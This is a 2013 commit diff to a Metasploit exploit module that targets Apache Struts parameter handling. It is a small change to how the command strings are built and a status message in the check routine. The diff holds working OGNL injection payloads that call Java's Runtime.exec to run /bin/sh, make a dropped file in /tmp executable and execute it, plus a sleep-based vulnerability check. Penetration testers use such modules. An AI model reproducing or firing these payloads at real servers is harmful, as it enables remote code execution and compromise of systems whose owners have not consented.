check function now tells user about delay

2013-03-21 16:40:45 +00:00 · 2013-03-21 16:40:45 +00:00 · 4edf5260f4
parent a714b430ca
commit 4edf5260f4
1 changed files with 5 additions and 3 deletions
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@ -96,14 +96,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		pl_exe = generate_payload_exe
 		chunk_length = 384
 		append = 'false'
-
+#		java_cmd = "@java.lang.Runtime@getRuntime().exec(%s)"
 		#Now arch specific...
 		case target['Platform']
 		when 'linux'
 			chunk_length = 128 #Complains of a long filename if left default.
 			@payload_exe = "/tmp/#{@payload_exe}"
-			chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh@-c@chmod +x #{@payload_exe}\".split(\"@\"))"
+#			chmod_cmd = java_cmd % '\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\")'
-			exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh@-c@#{@payload_exe}\".split(\"@\"))"
+			chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
 			exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
 		when 'java'
 			@payload_exe << ".jar"
 			pl_exe = payload.encoded_jar.pack
@ -147,6 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		check_cmd = "@java.lang.Thread@sleep(10000)"
 		t1 = Time.now
 		print_status("Asking remote server to sleep for 10 seconds")
 		response = execute_command(check_cmd)
 		t2 = Time.now
 		delta = t2 - t1